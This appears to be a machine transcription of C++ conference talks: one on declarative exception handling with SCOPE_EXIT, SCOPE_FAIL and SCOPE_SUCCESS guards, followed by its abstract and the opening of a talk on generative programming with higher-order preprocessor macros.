And I have the uncaught exception counter that we just defined. And this is my state. And my public interface is going to be: I have a constructor that takes the function. And most of the time, this function is going to be a lambda, because the macro, remember, the macro had that lambda-starting thing, right? And then it's completed into a lambda. And that lambda is going to make it here and close the deal, right? It makes it very, very easy to use and very pleasant. All right. I love this slide. I really like C++. So we have the initialization. We have also a bit of a repetition here, because, you know, the lambdas can be expensive to copy. So we have a move constructor kind of thing, which is going to move things. I'm glad that Nico and Scott predated this talk, so they, you know, explained the relatively new feature of moving data around. And the interesting action happens in the destructor. Where it goes like this: well, the destructor is noexcept if the Boolean executeOnException, which is a sort of a policy parameter, is true. So this is a conditional noexcept. And fortunately, all the modern compilers support that, which is nice. So it's noexcept if executeOnException is true, right? And if executeOnException is the same as the exception counter's isNewUncaughtException, then it means I need to execute the function. Now, if I pass a false to executeOnException, it means I'm not going to execute on exception; I'm going to execute if there's no exception. Remember, so we have SCOPE_EXIT, which is done. We have SCOPE_FAIL and we have SCOPE_SUCCESS. If you want to implement SCOPE_FAIL, you're going to pass a true here. If you want to implement SCOPE_SUCCESS, you're going to pass a false here, right? That's why this Boolean is needed. We want to implement two artifacts with only one piece of code, right?
So this, you know, the whole Boolean executeOnException would be a sort of a policy parameter kind of thing. All right. So far, so good? Questions? All right. So let's recap where we are. So what we have is the exception counter that tells me whether the current scope is throwing an exception right now, right? We have the implementation thereof on the two popular platforms. And now we're going to use that guy with this class, which says: well, ScopeGuardForNewException is going to, depending on this Boolean policy here, execute a lambda function if an exception is being thrown from the current scope or, on the contrary, if an exception is not being thrown by the current scope. So I'm sure, like, if we sat down together for a minute, we could all figure out how to use this guy with a macro to make SCOPE_FAIL and SCOPE_SUCCESS work. Nico, did you talk about decay? Is Nico here? Did you talk about decay yet? Okay. Okay. So, well, go to the future, attend Nico's talk, come back here, and here we are. It just worked. Back from the future. The decay is just a bit of noise that takes care of adapting, you know, decaying parameters from arrays to pointers and such. But essentially what I'm doing here is defining that operator+ scaffolding that you may remember from the beginning, when I implemented SCOPE_EXIT. It just serves for me to define the macro in an infix manner, such that I can write things like SCOPE_FAIL or whatever, and then I open a curly brace and write code. As part of the macro, there's the parenthesis and the capturing part. And then the user writes only the curly braces part of the lambda. So it looks really nice, like a pseudo statement. So this is my purpose.
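The guard class just described might look like this sketch, again substituting C++17's std::uncaught_exceptions() for the platform-specific counter; the template parameter names are approximations of the slide's.

```cpp
#include <exception>
#include <utility>

// Policy-parameterized guard: runs the stored function on scope exit either
// only when a new exception is in flight (executeOnException == true) or
// only when there is none (executeOnException == false).
template <typename FunctionType, bool executeOnException>
class ScopeGuardForNewException {
    FunctionType function_;
    int exceptionCount_;
public:
    explicit ScopeGuardForNewException(FunctionType&& fn)
        : function_(std::move(fn)),
          exceptionCount_(std::uncaught_exceptions()) {}
    // Conditional noexcept: noexcept(true) for the failure guard, which
    // must not throw; noexcept(false) for the success guard, which may.
    ~ScopeGuardForNewException() noexcept(executeOnException) {
        bool newException = std::uncaught_exceptions() > exceptionCount_;
        if (executeOnException == newException) {
            function_();
        }
    }
};
```

Instantiated with true it becomes the SCOPE_FAIL engine, with false the SCOPE_SUCCESS engine, which is the two-artifacts-from-one-class trick just mentioned.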
So I'm generalizing that guy to an operator+ that takes essentially an unused value of a unique type, and it takes the lambda, and it's going to return a ScopeGuardForNewException with true, because scope guard on fail goes with true. All right. So far so good. So I have a simple class that says ScopeGuardOnFail, and then I pass a true here and I create a new scope guard. Of course, we're going to do the same thing for the success case. So we have a unique type, ScopeGuardOnSuccess. By the way, all this new class business, you could write a struct here, it's the same thing. But I have to kind of make it a sort of economy of means. This really is a sort of a type with only one value or something like that. It's kind of an interesting, you know, enum class, this guy, an enum with no members. So, you know, essentially I made a career out of writing code that does nothing, because, like, if you remember my template code, it's all declarations that do nothing, and then essentially you use sizeof, and it's all sizeof-computes-something, right? So stuff that does nothing is very interesting. So I like it. And here we have pretty much the same code as before, except it's going to pass false here, because I want to execute this code in case of success, not failure. All right. So far so good. And now let's assemble this stuff into macros. Okay, let's go with the macros here. Here. Okay. So defining SCOPE_EXIT goes like this: create an anonymous variable, detail::ScopeGuardOnExit plus the beginning of the lambda. Defining SCOPE_FAIL: anonymous variable, scope fail state, detail::ScopeGuardOn... ScopeGuardOn... quick, quick, quick. ScopeGuardOnFail. Okay. I need a college degree to manipulate this thing. Okay. So, in the SCOPE_EXIT case, I would use an enum of type ScopeGuardOnExit.
In this case, I'm going to use a ScopeGuardOnFail, and in the third case, I'm going to use a ScopeGuardOnSuccess. So that's how I define the macros, the three macros that are helping me: scope guard on exit, fail, and success. And that's all I change in the macro definition. There are going to be three macros, each very similar to this, right? And at this point, I have the entire troika containing exit, fail, and also success. So essentially, we have a nice declarative battery of things where I can specify: if the current scope is successful, or exited by an error, or whatever, just execute this code. It simplifies a lot of code. We have quite a bit of experience with this construct, and actually other languages are trying to borrow it as well. So I highly recommend you try it. Now, let's see a few cases just to whet your appetite. Let me see. Okay, great. Perfect. So let's look at a few cases. But first, actually, there's a slide that I kept on running over. Who noticed that? I don't know. If there's no hand, I'm not going to go to that slide. There's always two hands. Okay. So let me go back to the slide and explain the dirtiest aspect of it all. You're going to hate this, this guy. So there is a way to define an anonymous variable using the preprocessor. And it's not intuitive and it's weird. So that's why you should know it, right? That's why you should know it and use it everywhere you can, right? Because that is the C preprocessor spirit. So, well, we'll start with a simple macro that concatenates two tokens. The way it goes is, you know, essentially, you need to use the token-pasting operator, pound-pound. It's been there since the days of C, right? But the thing is, you've got to use a little indirection. So the way it's implemented correctly is: CONCATENATE of token 1, token 2, symbol 1, symbol 2, forwards to another macro, CONCATENATE_IMPL, from implementation. And that guy is going to do the actual pasting.
If you don't do this, you're going to concatenate the names of the macros you're trying to concatenate instead of their values. So that's why I need an extra indirection, to give those macros the chance to get expanded, okay? All right. And now there's this artifact present in all popular compilers, which is called __COUNTER__, underscore underscore COUNTER underscore underscore, and whenever you use it, it's going to increment its value. So the first use is going to give you a 1, and the second is going to be a 2, and so on and so forth. So it's a nice auto-incrementing counter during compilation. You can use it for fun and profit, such as in defining an anonymous variable, obviously, for some definition of obviously. So let's define an anonymous variable with some prefix: concatenate that prefix with __COUNTER__. When you invoke the concatenate macro with these guys, whatever you pass here, like the symbol hello, there's going to be a hello here, and then there's going to be the counter, whichever value it currently has, concatenated. So I'm going to get hello42, and that's going to be a name. But the next time I'm creating an anonymous variable, it's going to be hello43, which is a distinct name from hello42, hence the notion that I'm generating variables really easily, right? And if your compiler does not implement __COUNTER__, which is, like, this guy, because there was only one hand that said I'm not using GCC or MSVC, both of which implement that thing, if __COUNTER__ doesn't exist, you can do the same trick with the current line, __LINE__. The limitation here being, you tell me, what's worse about __LINE__ than __COUNTER__? You can't define two anonymous variables on the same line, right?
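The two macros plus __COUNTER__ might be sketched like this; the macro names follow the talk, while the trailing demo constants are mine, just to make the increment observable.

```cpp
#include <cassert>

// Token pasting needs one level of indirection so that macro arguments
// (like __COUNTER__) get expanded *before* ## glues them together.
#define CONCATENATE_IMPL(s1, s2) s1##s2
#define CONCATENATE(s1, s2) CONCATENATE_IMPL(s1, s2)
#define ANONYMOUS_VARIABLE(str) CONCATENATE(str, __COUNTER__)

// __COUNTER__ expands to a fresh number on each use, so two "anonymous"
// variables with the same prefix can coexist in one scope:
int ANONYMOUS_VARIABLE(demoVar) = 1;
int ANONYMOUS_VARIABLE(demoVar) = 2;

// Capture two consecutive uses so the increment is observable.
const int counterFirst = __COUNTER__;
const int counterSecond = __COUNTER__;
```

Without the CONCATENATE_IMPL indirection, `str##__COUNTER__` would paste the literal token `__COUNTER__` instead of its value, and the second declaration would be a redefinition error.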
And, you know, by John Carmack's famous quote, if anything works, it's going to appear in your code base, because code bases just grow; whatever is syntactically sensible is going to be there. So it is a risk. So this is sort of an unpleasant thing about __LINE__, which __COUNTER__ fixes. And this whole thing is quite portable, because, you know, ifdef __COUNTER__, you're going to do it the smart way, and else you're going to do it the more limited way. So far, so good. So this is how you create anonymous variables, and to complete the whole thing, here we say auto, anonymous variable, so here it's going to be scope exit state followed by a number, right? And then you have detail and stuff. By the way, this anonymous variable thing, if you go to github.com/facebook/folly, you're going to find that we use it in a lot more places. We use anonymous variables for a variety of other pseudo statements, for synchronization and locking and stuff. So pretty neat. I recommend you remember this. By the way, the slides are going to be available, I think, to everyone, I think we're going to publish them, but just in case you're in a hurry, just shoot me an email and I'll send them to you. I have the cutest email in the world, by the way, aaatfb.com. So got to love that. It's easy to remember. Okay, let's see a few use cases now. So, all right. Well, the simplest is, you know, these are sort of taken from actual code. Well, log in, and if login fails, then I'm emitting sort of a log line here saying what happened. And it's nice, because if you have an exception here, you're not going to see that we're trying to log in. What you're going to see would be something like database connection timeout, right, or something like that, networking timeout. And what the hell was I doing, right? Where was I? What was happening? So this is going to nicely log the fact that you're attempting to log in and it didn't work.
So this is in a way more information than just the exception. This is sort of a beef I have with exceptions. They kind of give you the low-level reason, but they don't give a good account of what's happening. So you've got to look at the stack trace, which is low-level and stuff like that. So this is nice. It's a high-level trace, as opposed to the stack trace. So, all right, it shows major failure points more easily. And this is user-level, you can show it to the user and things like that. Nice. How about doing some transactional work? And here, careful. Well, we're creating a file, and we want to build it in a way that's never going to create an invalid, truncated file. And to do so, we're going to say, well, let me create a file that has a suffix, dot-delete-me or whatever you want. Dot-temp, dot-in-progress, in-construction, fragment, whatever, right? And then we're going to open that temporary file, and we're going to make sure that the creation succeeded. And then on success, we're going to close the file and we're going to rename it from dot-delete-me to the original name, which is the right thing to do. So this tells me, in a declarative manner, what I'm supposed to do in case the whole thing works, right? Well, on failure, if things do not go the way we planned, I'm going to close the file, attempt to close the file, but not caring if that fclose fails. I'm not going to worry about it, because we failed already. So this is kind of a courtesy call. And I'm going to attempt to delete the file. And if worse comes to worst, I'm going to have a file with the extension dot-delete-me left on the disk. If anything, if the worst happened, which would probably be, like, unlink doesn't work and things like that, right? So far, so good, question. What if I swap these two, what if I swap the two pseudo statements, SCOPE_SUCCESS and SCOPE_FAIL? Yes? What happens if you fail to close here? Excellent question.
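The transactional file example might be sketched end to end like this. It repeats the SCOPE_FAIL / SCOPE_SUCCESS scaffolding in compact, self-contained form (using C++17's std::uncaught_exceptions()); the function name and error strings are illustrative, and SCOPE_FAIL is planted before SCOPE_SUCCESS per the discussion that follows.

```cpp
#include <cstdio>
#include <exception>
#include <stdexcept>
#include <string>
#include <utility>

// Compact restatement of the guard scaffolding from the earlier sketches.
namespace detail {
template <typename F, bool executeOnException>
class ScopeGuardForNewException {
    F function_;
    int exceptionCount_;
public:
    explicit ScopeGuardForNewException(F&& fn)
        : function_(std::move(fn)), exceptionCount_(std::uncaught_exceptions()) {}
    ~ScopeGuardForNewException() noexcept(executeOnException) {
        if (executeOnException == (std::uncaught_exceptions() > exceptionCount_))
            function_();
    }
};
enum class ScopeGuardOnFail {};
enum class ScopeGuardOnSuccess {};
template <typename F>
ScopeGuardForNewException<F, true> operator+(ScopeGuardOnFail, F&& fn) {
    return ScopeGuardForNewException<F, true>(std::move(fn));
}
template <typename F>
ScopeGuardForNewException<F, false> operator+(ScopeGuardOnSuccess, F&& fn) {
    return ScopeGuardForNewException<F, false>(std::move(fn));
}
}  // namespace detail

#define GR_CONCAT_IMPL(a, b) a##b
#define GR_CONCAT(a, b) GR_CONCAT_IMPL(a, b)
#define SCOPE_FAIL auto GR_CONCAT(scopeFailState, __COUNTER__) = \
    detail::ScopeGuardOnFail() + [&]() noexcept
#define SCOPE_SUCCESS auto GR_CONCAT(scopeSuccessState, __COUNTER__) = \
    detail::ScopeGuardOnSuccess() + [&]()

// Build "<name>.deleteme" and rename it into place only on success, so an
// invalid, truncated file never appears under the final name.
void writeFileTransactionally(const std::string& name, const std::string& contents) {
    const std::string tmp = name + ".deleteme";
    std::FILE* f = std::fopen(tmp.c_str(), "w");
    if (!f) throw std::runtime_error("cannot create " + tmp);
    SCOPE_FAIL {
        if (f) std::fclose(f);     // courtesy call; we don't care if it fails
        std::remove(tmp.c_str());  // best effort: don't leave the fragment
    };
    SCOPE_SUCCESS {
        std::FILE* g = f;
        f = nullptr;  // so SCOPE_FAIL won't close it twice if we throw below
        if (std::fclose(g) != 0 || std::rename(tmp.c_str(), name.c_str()) != 0)
            throw std::runtime_error("cannot finalize " + name);
    };
    if (std::fwrite(contents.data(), 1, contents.size(), f) != contents.size())
        throw std::runtime_error("short write to " + tmp);
}
```

If the write throws, only the failure guard runs and the fragment is removed; if everything works, only the success guard runs and the rename makes the file appear atomically under its final name.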
But, you know, it doesn't answer mine, but let's work on this guy. What do you think happens? Anybody? Everybody? Well, if it fails, then, first of all, will the program terminate? Like, badly? Will the program be aborted? No, because SCOPE_SUCCESS is going to be invoked if and only if the current scope is not left by means of an exception. Remember, destructors that throw are bad. And this lambda actually executes within a destructor. But because of the whole machinery we've produced for ourselves, we know now that the destructor is executed in a non-throwing context. So it's okay to throw from this destructor. So SCOPE_SUCCESS is allowed to throw. Okay? The dot dot dot here is, like, whatever I need to do to create that file and write to it via the handle f. So SCOPE_SUCCESS is going to be executed at the very end of the function, in case the whole thing worked. And then, if whatever it did worked but your closing statement did not work, then it's okay to throw. You're going to just throw, and everything's going to continue with that exception. So SCOPE_FAIL, can it throw? Right. So SCOPE_FAIL cannot throw, and actually a compiler could warn about it, because, let me go back here, here. Because of this flag here, the compiler may warn you that you're trying to throw from a noexcept function, right? And actually GNU does that kind of stuff. It says, oh, you have a noexcept function, and you're actually trying to throw exceptions and stuff. So in SCOPE_FAIL, you don't want to throw, because throwing from SCOPE_FAIL essentially terminates the application immediately. It's the classic case of throwing an exception while an exception is in flight; that's not allowed by C++. It's just going to terminate the application abruptly. You probably never want to do that, essentially. So this is nice.
It's a lot better than C++98 and, you know, the previous scope guard implementations and everything, because it has some quite nice statically checkable approach to this kind of stuff. So now, let's get back to my previous question. What if I swap these two? It makes no difference. Why? Well, because, so, okay, so let me repeat, make sure I understood: because per declarative programming's general ethos, the order shouldn't matter. Actually, it does matter in general. In this case, it doesn't matter because SCOPE_FAIL and SCOPE_SUCCESS are opposites. So they're never going to execute at the same time. Yes? I don't think it does matter, because if that one throws an exception, now this one will not get called. This guy? Not that one. Okay. If that one throws, now it doesn't get called, the SCOPE_FAIL, because that one has already been destroyed by then. Oh, that's right. Yeah, excellent. If you swap them around, it will get called just the same. Yeah, but here's the thing. Okay, so actually, it's better code to move the SCOPE_FAIL above, because in that case, you unlink the file, too. Right? So, okay, so let's move SCOPE_FAIL above SCOPE_SUCCESS. In that case, the whole thing is, oh, no, no, no, no, because the SCOPE_FAIL is done already by the time you reach SCOPE_SUCCESS. Yeah, but, oh, yeah, because of the stack. Okay, so let's move SCOPE_FAIL above SCOPE_SUCCESS here, and then we're going to say, okay, so let's say the whole code is about to succeed. I'm going to throw from fclose; at that point, because SCOPE_FAIL was planted before, I'm going to attempt again to fclose, but this time I'm not going to care, and then I'm going to unlink. Yes, it's better to put SCOPE_FAIL before SCOPE_SUCCESS. Thank you. My slides keep on improving. All right, thanks, Sam. Yes? Isn't it easier just not to throw from success?
It would be easier to not throw from success, but generally you want to have that liberty. It's important to be able to throw when you can. All right, very nice. Thanks very much, Sam. All right, and, you know, as I said, the order matters, and this sort of reproduces what Sam just said. It's better to move the SCOPE_FAIL above. Oh, here I kind of planted it too early. Give me a minute. No, the thing is, I was scoffing at this notion that I'm going to attempt to close the same file again; I want to just fail as fast as possible, as swiftly as possible, and just be done with it. All right, so please note: only SCOPE_SUCCESS may throw. The other two are not allowed to. In SCOPE_FAIL, if I throw, it's guaranteed sudden death, and in SCOPE_EXIT, it may or may not die, right? Because SCOPE_EXIT could be exited via exception or it could be exited however. All right. Postconditions are great with SCOPE_SUCCESS, because whenever the current scope is exited normally, we can assert that the postcondition is satisfied. And actually, I've seen people define classes for that purpose, right? They say, you know, I have a class, and the destructor is going to do the checking and that kind of stuff. Same about things like invariants and such, right? The sentinel: a common trick that people use whenever they want to do high-performance code and there's a buffer, there's a length, and essentially you're searching for a specific character. This is sort of a fast idiom for searching things. You have a buffer, and you plant what you're searching for at the very end of the buffer, so you don't need to check for "is the buffer done yet". So you can just go straight through it without any checks, right?
And that idiom is nicely completed by a thing like scope exit, which restores the last character in the buffer. So by the way, I recommend this idiom for efficiency. It's very good for writing lexers and generally language processors that must be really fast, because what you do is, for each point in the buffer, no checking for the buffer ending; you're going to have a switch on give me the next character in the buffer, and here among the other cases, you're going to have a case of 255 and you're going to be done, right? Now, what's the speed advantage of this guy compared to the classic for each character in buffer? Yes. Thoughts. Why is this faster than the classic for each character in the buffer, process the character? Yes. There's one less test. There's one less test. Actually, there is still the test, because in the switch here, I'm going to test for 255. There's still one test. But the cost of the test is going to be divided by the number of cases in the switch statement, because the switch is going to be a table lookup, right? So instead of testing each time, am I done yet? Am I done yet? In the bad case, I'm testing each time and then I have the switch to handle the character. But in this case, I'm testing and handling simultaneously in the same switch statement, and that roughly doubles the speed of a lot of simple language processing. So do remember this idiom. It's highly nice and not very well known, actually. All right. And this is a nice idiom, and scope exit kind of puts the icing on the cake, because it makes it a one-liner to not forget to restore the buffer as you exit the function, right? So you're not going to mess things up. All right. Scoped changes. I've noticed this, too. This is also sort of a classic. Well, I have a global sweeping, and this is a sweep, you know, in a program.
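The sentinel idiom above can be sketched in a few lines. This is an illustrative function (not the talk's lexer): we plant an otherwise-impossible byte (255) at the end of the buffer so the hot loop needs no separate bounds check; the sentinel is just one more case in the switch, and the restore at the end plays the role the talk assigns to scope exit:

```cpp
#include <cassert>
#include <cstddef>
#include <string>

// Count spaces in buf using the sentinel trick. Assumes the text itself
// never contains byte 0xFF (true for plain ASCII input).
std::size_t countSpaces(std::string& buf) {
    if (buf.empty()) return 0;
    const char saved = buf.back();
    buf.back() = static_cast<char>(0xFF);              // plant the sentinel
    std::size_t spaces = 0, i = 0;
    for (;;) {                                         // the infinite loop...
        switch (static_cast<unsigned char>(buf[i++])) {  // ...and the switch
        case 0xFF:                                     // sentinel: buffer exhausted
            buf.back() = saved;                        // restore the last character
            if (saved == ' ') ++spaces;                // the saved char still counts
            return spaces;
        case ' ':
            ++spaces;
            break;
        default:
            break;                                     // handle other characters here
        }
    }
}
```

Note that the termination test and the character dispatch happen in the same table lookup, which is the whole point: the "am I done yet" check costs nothing extra.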
It turns out to be called from HHVM. So I'm setting, at the entry of the function, this global to true. I'm sweeping right now. It tracks whether or not I'm inside sweep, and when I exit the scope, I'm going to have restored the sweeping to false, and then I'm going to do stuff. So this is nice. Of course, I could make a class for that. Any use of scope exit could be supplanted by, replaced by, using a class, but actually with scope exit it is very simple to just get away in two lines instead of writing the whole class. All right. So whenever we have some transaction but you don't have an RAII type built for it, it's very easy to, well, did you have a thing for file locking? Maybe not. So I could build a class for file locking if I use it everywhere, but if I use it only occasionally, I can just get away with saying, well, flock, and then enforce flock unlock, and then done. By the way, this enforce here is going to cause that sudden termination, but essentially I looked at the documentation and this actually can't fail. If you call unlock, it's never going to fail, which is a nice thing. So, you know, make sure that you do the right thing whenever you throw from scope exit. Yes. Is this better to use than unique pointer? Is this better to use than unique pointer? You tell me. Unique pointer to what? You can specify what you do in scope exit. You can specify as a unique pointer. That's the thing. So just repeat for the record here, because I'm going to destroy Niko in the next minute. The comment was: you can use a unique pointer with a custom deleter, and it's nice, right? My question is, unique pointer to what? I could have a unique pointer to void, to pretty much nothing, or to an int that doesn't exist, and use the custom deleter. Is that correct? Right. Well, my question is, which code is going to look goofier?
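The sweeping-flag example can be reproduced with a minimal SCOPE_EXIT. The talk's macro comes from a production library; this is a stripped-down reimplementation (a lambda run from a destructor, relying on C++17 guaranteed copy elision), just enough to show the two-line scoped change:

```cpp
#include <cassert>
#include <utility>

// Minimal scope-exit sketch: runs the stored lambda when the scope is left,
// by exception or otherwise. Not a full library implementation.
template <class F>
struct ScopeExit {
    F f;
    ~ScopeExit() { f(); }
};
template <class F>
ScopeExit<F> makeScopeExit(F f) { return ScopeExit<F>{std::move(f)}; }

#define SCOPE_CONCAT2(a, b) a##b
#define SCOPE_CONCAT(a, b) SCOPE_CONCAT2(a, b)
#define SCOPE_EXIT(code) \
    auto SCOPE_CONCAT(scopeExit_, __LINE__) = makeScopeExit([&] code)

bool sweeping = false;            // the global from the HHVM example
bool wasSweepingInside = false;   // observable for the test below

void sweep() {
    sweeping = true;
    SCOPE_EXIT({ sweeping = false; });   // restored however we leave the scope
    wasSweepingInside = sweeping;
    // ... do the actual sweeping work here ...
}
```

Two lines instead of a whole RAII class; the flag is guaranteed to be restored even if the sweeping work throws.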
One that says do this and when the scope exits do that, or one that says, oh, let me create a unique pointer to nothing and, by the way, I'm going to specify a custom deleter, and if you don't know what it is, run to the fine manual, RTFM. That's what it stands for, right? Read the fine manual. All right. So you could do things like write your own class, file locker. You could use a unique pointer with a custom deleter. You could. I'm not saying you should, and, you know, there's taste to be applied in all of this stuff, right? All right. So, closing remarks. All examples are taken from actual production code. It works and kind of pleases people and is readable and interesting. That's not trivial stuff. Notice that the declarative focus is going through all of it. So we're going to declare contingency actions depending on the context. Scope fail, exit and success are going to be more frequent than try in new code. This is my experience with the idiom. And the latter remains in use for actual handling. So try is going to still be used whenever you actually want to handle the error, as opposed to doing stuff with your own code in case an error appears. So if you want to handle the error, say try, catch, you catch it, et cetera, and kind of deal with it. You print it, display it, whatever, right? Retry, et cetera. So this scope stuff is just for managing what your code should do if something bad happens. But if something bad does happen, you're going to have to handle it at some point, at a high level in the application. The flow gets flattened. So the control flow gets, you know, no more ifs, tries and stuff. And the order still matters, as we discussed. So it depends on how you plant your handlers. And Sam just destroyed my slide because I advised against what I should be doing. All right. To summarize, this is it. Questions. All right. So I'll be here for a few more minutes.
I'll take these offline, okay? I'll be here for a few minutes. I'm going to, I want to let you eat some cookies now, okay? Thanks. And don't forget the feedback while the, you know, while the, while the trauma is still fresh. Thank you very much.
Getting exception handling right is a perennial problem in C++ that has eluded systematization. Not for much longer. New language and library developments make it possible to handle exceptions in a declarative manner, leading to drastic code simplification. This talk discusses an alternative approach to handling exceptional flow that eliminates the need for small ancillary RAII classes, try/catch statements that rethrow, and other cleanup mechanisms. The popular Scope Guard idiom gets a spectacular generalization. Statements specify in a declarative manner actions to be taken if the current scope is left normally or via an exception. The resulting code is simpler, smaller, and easier to maintain.
10.5446/50578 (DOI)
Ladies and gentlemen. Gentlemen. So I'm going to talk about generic and generative programming in C++. And when I prepared this class, I was told repeatedly by Olwe and other people advising me on this conference, oh, go easy on them. Don't teach the advanced stuff because, you know, you're going to lose everybody and stuff. And now I see that the most hardcore C++ diehards are in this room. So I hope this is not going to be an underwhelming experience for you. Don't forget, when in doubt, green is your favorite color. That's what you need to do. Let's move forward. Don't forget that I also have a talk tomorrow morning. I forgot the exact time, but it's going to be on the D programming language, and you should join me in more than one sense. So generative programming is, and here is the point where I need to have your participation. What is generative programming? Let's define it, because I notice that many people talk about things without having defined them well, and, you know, it's kind of difficult to keep something at a vague level and at the same time discuss it. So what do you think is generative programming? Who can give a somewhat precise definition? It doesn't need to be very precise. What does it mean to you, generative programming? Ideas, thoughts, yes? Generate program code inside your program at run time? Generate, yeah, exactly. So I think you almost got my text: it's writing code that generates code, right? So as soon as you have a piece of code that you write that in turn generates code, boom, you're doing generative programming, awesome. So now the thing is, it always gets weird. I've written in my time a lot of code. I've written things like PHP that generates JavaScript. C++ that generates C++. D that generates C++. D that generates D. And, you know, there's a lot of combinations that are possible there.
And the odd thing is it puts your mind into a weird state, because you need to think about two things at the same time: what your code does, and what the code generated by your code does. And that's almost always an eerie experience. So when do you need this kind of eerie stuff? You need it mostly when you're seeing symptoms like solid duplication in and across projects. There's almost the same code; there are always five differences that you can't really catch, right? So you always kind of have to, for example, copy the same 300 lines in an application without even understanding them. We are having this phenomenon at Facebook. Who knows about Thrift? Thrift is a very nice transport package that knows how to serialize objects and implement services easily and with high performance. Google has a similar package called Protocol Buffers. And essentially any high-bandwidth company is going to have such interoperation code for distributed computing. So Thrift allows machines to communicate with one another and exchange information, call functions remotely, and things like that. And we have this funny story at Facebook: everybody's like, oh, let me implement a Thrift server. And what do they do? They go and copy and paste their last server, right? Which was pasted from the previous server, which was pasted from a previous server, which was pasted from an example that the first guy who implemented Thrift wrote, right? Because everybody knows, oh, this is the code that works, and this is the code that works really well, because somebody in the beginning sat down and implemented a really high-performance server, and everybody's copying the same code over and over again. So it would be nice to be able to implement a server in just a few lines of code, and have enough configuration and tweaking knobs to be able to make it work in any way you want.
So such tweaking and knobbing and whatnot is impossible to cope with using the traditional abstraction techniques. We've tried to do some stuff about the Thrift servers, but it turns out there's always one little thing you want to configure. There's always one little thing you want to have different, and it matters, because performance does matter. So another completely separate case of generative programming deficit would be things like: you need to maintain parallel class hierarchies that look the same in shape but do different things. But they must stay in the same shape; otherwise the program is wrong. And the classics are things like factory hierarchies and visitation hierarchies and things like that. So highly unpleasant. Another thing, which has become sort of an endemic problem in certain projects, is things like: you have many points of maintenance. To do anything you've got to modify programs in three distinct places that span multiple languages even, and multiple servers, and things like that. And actually this is taken from an old production project. To add a table column you need to change four places: C++, a C++ module for PHP, a Thrift file, and a Python script. I'm not kidding. Who here has seen stuff like this? Be honest. Okay, that half, be honest. These guys, okay, it's like waving. Okay. Terrific. So this is generative programming with C++. It's not generative programming with templates, which I'm notorious for. But I found that macros are a valuable tool in generating code. And this is taken from a C++ linter that I wrote a while ago, which is actually open source; if you look for Flint on GitHub you're going to find it. And this C++ code has since been rewritten, but it's a very good example, a standard example, of how you can implement a non-trivial processing program with high performance using a generative technique based on macros. So, define. Let me teach you this important idiom for generating code in C++.
So apply here is the interesting thing. It's a parameter to a function-like macro, right? It's a parameter to the macro, and it's used in a call as if it were a function or a macro itself. So this is key. This is unusual, because usually people define something that takes an argument, and then they use the argument somewhere in a position like an argument for other stuff. In this case, it's sort of a higher-order function if you wish, only done with macros. It's a higher-order macro. Here we just invented a whole new denomination for this kind of thing. So it says, well, apply, whatever the hell apply is, apply this guy to the tilde and call it token tilde. These seem to be some sort of constants. We're going to get to that soon. Apply open paren to L paren, and so on and so forth. And notice that all of these are C++ tokens that you may recognize. So this is sort of a C++ tokenizer, lexer, that recognizes C++ tokens, right? This is the idea here. We want to tokenize text into C++ tokens fast, and we want to be able to support the entire token paraphernalia of C++. All right. Well, then we have a slightly different thing, because those were one-character tokens, but then we have one-or-two-character tokens, and again we have a higher-order macro where we pass this apply unknown thing. We pass the apply to this macro, which is going to generate, well, apply colon, and it's a TK colon, or a second colon, which would generate the token double colon. So in C++ there is a token which is a colon, and there's a token which is two colons next to each other, right? And that's a different token. That doesn't have anything to do with one colon. So you've got to generate a different token. So you see, this macro for one-or-two-character tokens is going to generate all C++ tokens that have one or two characters, right? Wait, what about three-character tokens?
What do you think follows? One or two or three, right? Okay. But, you know, again, we don't know yet what's going on with these guys. What we do know is that the first macro here is going to expand apply for the right character and the token symbol for everything that's a one-character token, and then this guy is going to expand whatever apply is for tokens containing one or two characters. All right. And I stop here because there are a couple of three-character tokens, shift-shift-equal and stuff, that are too few, and I did those by hand. So that's fine. So now here's the interesting thing. We say enum Token, so now I'm using the macros, the generative macros, and it's going to explode into a bunch of code, and you haven't seen anything yet, because this is a lot of code that's going to be generated. So let me define an apply macro that, given A and B, just expands to B comma, and then I expand the for-all-one-character-tokens macro with apply. What is it going to expand to? Yes? No, somebody else. Sorry, sorry. Yes, everyone gets one question. You only, no soup for you. Okay. You only get one question each. So let's get back to one-character tokens. This guy has apply, argument one, argument two, and the way it's used, let's take the second guy and follow it about the comma. What does it expand to? This whole column here of TK underscore names, with commas following them. And guess what? Because it appears inside an enum definition, enum Token, open curly, and I defined this guy to be B comma, when I expand this macro it's going to nicely expand all of the TK underscore names. So I'm going to have an enumeration whose values nicely cover all of the token names for me, which is nice, right?
And then I'm #undef-ing this guy, so I want to maintain some cleanliness here, as much as that's possible with macros, no further comment. And I'm going to redefine it as something that takes four parameters, and I'm going to expand B comma, D comma. Well, let's see what happens if I expand this guy now: it's going to take this column and this column and expand both. So all of a sudden, with five lines, I've got all the token names in one place in an enum. Everything. And the total number of tokens in C++ is, I forgot, maybe 120 tokens or so. There are plenty of types of tokens. The thing is, I generate them real easy, with just a five-liner, because of the generative abilities of these pesky macros. And then there may be some fix-ups that I do by hand, like three-character tokens and stuff. There's options. You can actually see the production code online. So very interesting, but so far it's like, okay, so you put some macros in, what did you really do? Is there anything interesting about this? Well, there is, if you use them more than once. Because an instruction that you use only once is kind of, okay. But let's use it a second time. And here's the high-performance part of the code, which goes like this. Let me put it this way. Any fast program is going to have two things: an infinite loop and a switch statement. If you don't have those, your program is not fast enough. Okay. Now I'm only half kidding. Because the infinite loop is going to be a loop in which, inside, you have complete control of what happens, and it's followed by an unconditional jump to the beginning. And it's going to be like the fastest construct ever possible. And inside you have conditionals and, you know, you carefully look at what's going on. So here I want to write a really fast function.
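The double-expansion trick described above can be sketched in miniature. This is not the linter's actual token list (those names and macros are illustrative); the point is that the list is written once, and each expansion of it plugs in a different `APPLY`, keeping the enum and a parallel name table in sync for free:

```cpp
#include <cassert>
#include <cstring>

// The token list, written exactly once. APPLY is a macro parameter used
// as if it were a macro itself -- the higher-order macro trick.
#define ONE_CHAR_TOKENS(APPLY) \
    APPLY('~', TK_TILDE)       \
    APPLY('!', TK_NOT)         \
    APPLY('^', TK_XOR)

// Expansion #1: generate the enumerators.
#define APPLY(c, name) name,
enum Token { ONE_CHAR_TOKENS(APPLY) TK_EOF, NUM_TOKENS };
#undef APPLY

// Expansion #2 of the SAME list: generate printable names.
#define APPLY(c, name) #name,
const char* const tokenNames[] = { ONE_CHAR_TOKENS(APPLY) "TK_EOF" };
#undef APPLY
```

Add a token to `ONE_CHAR_TOKENS` and both the enum and the name table update together; that is the single point of maintenance the talk is after.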
